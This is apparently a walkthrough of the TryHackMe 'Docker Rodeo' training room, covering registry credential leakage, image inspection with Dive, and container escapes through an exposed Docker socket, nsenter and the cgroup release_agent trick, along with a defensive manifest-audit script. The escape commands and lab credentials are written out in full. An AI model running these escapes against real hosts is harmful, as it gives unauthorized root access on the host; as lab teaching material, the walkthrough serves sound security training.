TryHackMe - Docker Rodeo - Walkthrough

Introduction

Today we're going to be doing a walkthrough for the Docker Rodeo room hosted at https://tryhackme.com/room/dockerrodeo . For this walkthrough, we'll be using two virtual machines (VMs): the TryHackMe AttackBox as our attacking machine, and the deployed vulnerable Docker instance as the victim machine.

Task 1 - 1. Preface: Setting up Docker for this Room (Deploy #1)

Setup Walkthrough

1.2 Add Instance IP address to /etc/hosts

echo "10.10.2.35 docker-rodeo.thm" >> /etc/hosts


1.3 Tell Docker to Trust your Instance

echo $'{\n "insecure-registries" : ["docker-rodeo.thm:5000","docker-rodeo.thm:7000"]\n}' > /etc/docker/daemon.json


1.4 Restart Docker

While working through the room, we found that Docker would not start again after being stopped the way the room instructs. In that case, rebooting the system forces the Docker service to restart.

shutdown -r now


Questions:

Let's go

No answer needed

Task 2 - 2. Introduction to Docker

Questions

Does Docker run on a Hypervisor? (Yay/Nay)

Answer contained with Task description

Task 3 - 3. Vulnerability #1: Abusing a Docker Registry

Questions

This task is a divider, please proceed onto the next task.

No answer needed

Task 4 - 3.1. What is a Docker Registry?

Questions

I've learnt about Docker registries

No answer needed

Task 5 - 3.2. Interacting with a Docker Registry

Questions

What is the name of the repository within this registry?

In Postman:
http://docker-rodeo.thm:7000/v2/_catalog


What is the name of the tag that has been published?

In Postman:
http://docker-rodeo.thm:7000/v2/securesolutions/webserver/tags/list


What is the Username in the database configuration?
What is the Password in the database configuration?

In Postman:
http://docker-rodeo.thm:7000/v2/securesolutions/webserver/manifests/production
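The three requests above (catalog, tag list, manifest) are the Registry v2 API; the credentials turn up in the manifest because an ENV instruction baked them into a layer. The script below is an added example, not part of the original walkthrough: it parses a schema-v1 manifest of that shape and lists every ENV variable recorded in the layer history, flagging names that look like credentials, so you can audit your own registry for the same leak. The manifest is a constructed sample with placeholder values, and `fetch_json` is only needed against a live registry.

```python
import json
import re
import urllib.request

# Variable names that suggest a credential was baked into the image via ENV.
SECRET_NAME = re.compile(r"PASS(WORD)?|SECRET|TOKEN|API_?KEY", re.IGNORECASE)

def fetch_json(url):
    """GET a Registry v2 endpoint (e.g. /v2/_catalog) and decode the JSON body."""
    with urllib.request.urlopen(url, timeout=10) as resp:
        return json.loads(resp.read().decode())

def layer_commands(manifest):
    """Build command of each layer, oldest first, from a schema-v1 manifest dict.
    The registry lists the newest layer first in 'history', so the order is reversed."""
    cmds = []
    for entry in reversed(manifest.get("history", [])):
        compat = json.loads(entry["v1Compatibility"])
        cmd = compat.get("container_config", {}).get("Cmd") or []
        cmds.append(" ".join(cmd))
    return cmds

def env_from_history(manifest):
    """Collect NAME=value pairs set by ENV instructions; later layers override earlier ones."""
    env = {}
    for cmd in layer_commands(manifest):
        m = re.search(r"#\(nop\)\s+ENV\s+(.*)", cmd)
        if m:
            for assignment in m.group(1).split():
                name, sep, value = assignment.partition("=")
                if sep:
                    env[name] = value
    return env

def suspicious_env(manifest):
    """Names of baked-in variables that look like credentials."""
    return sorted(n for n in env_from_history(manifest) if SECRET_NAME.search(n))

# Constructed sample manifest, shaped like GET /v2/<repo>/manifests/<tag> output.
# The values are placeholders, not the room's real configuration.
SAMPLE_MANIFEST = {
    "schemaVersion": 1, "name": "securesolutions/webserver", "tag": "production",
    "history": [
        {"v1Compatibility": json.dumps({"container_config": {"Cmd": [
            "/bin/sh", "-c", "#(nop)  ENV DB_USER=webapp DB_PASSWORD=placeholder-secret"]}})},
        {"v1Compatibility": json.dumps({"container_config": {"Cmd": [
            "/bin/sh", "-c", "apt-get update && apt-get install -y apache2"]}})},
    ],
}

if __name__ == "__main__":
    # Against a live registry: manifest = fetch_json("http://<registry>/v2/<repo>/manifests/<tag>")
    print(env_from_history(SAMPLE_MANIFEST), suspicious_env(SAMPLE_MANIFEST))
```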


Task 6 - 4. Vulnerability #2: Reverse Engineering Docker Images

Questions

What is the "IMAGE_ID" for the "challenge" Docker image that you just downloaded?

wget https://github.com/wagoodman/dive/releases/download/v0.9.2/dive_0.9.2_linux_amd64.deb
apt install ./dive_0.9.2_linux_amd64.deb
docker pull docker-rodeo.thm:5000/dive/example
docker images



Using Dive, how many "Layers" are there in this image?

dive <answer from previous question>


What user is successfully added?

In Dive:
Navigate to Layer 4 (counting from 0)


Task 7 - 5. Vulnerability #3: Uploading Malicious Docker Images

Questions

I've learnt that we can publish images with malicious code such as reverse shells to our vulnerable Docker registry.

No answer needed

Task 8 - 6. Vulnerability #4: RCE via Exposed Docker Daemon

Questions

I've executed some Docker commands remotely on the vulnerable Instance

No answer needed

Task 9 - 7. Vulnerability #5: Escape via Exposed Docker Daemon

Questions

Escape Successful

No answer needed

(unofficial)

ssh danny@10.10.232.225 -p 2233
password: danny
groups


docker run -v /:/mnt --rm -it alpine chroot /mnt sh
whoami
groups


Task 10 - 8. Vulnerability #6: Shared Namespaces

Questions

Attempt the exploit, you will know you are successful if you can ls /home/cmnatic

No answer needed

(unofficial)

ssh root@10.10.232.225 -p 2244
password: danny
nsenter --target 1 --mount sh
hostnamectl




Task 11 - 9. Vulnerability #7: Misconfigured Privileges (Deploy #2)

Questions

Contents of "flag.txt" from the host operating system

ssh root@10.10.8.193 -p 2244
password: danny
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/exploit" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /exploit
echo "cat /home/cmnatic/flag.txt > $host_path/flag.txt" >> /exploit
chmod a+x /exploit
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
cat /flag.txt




Task 12 - 10. Securing Your Container

Questions


I've secured my containers

No answer needed

Task 13 - 11. Bonus: Determining if we're in a container

Questions

Confirming suspicions...

No answer needed

Task 14 - 12. Additional Material

Questions

Finished!

No answer needed

Finish
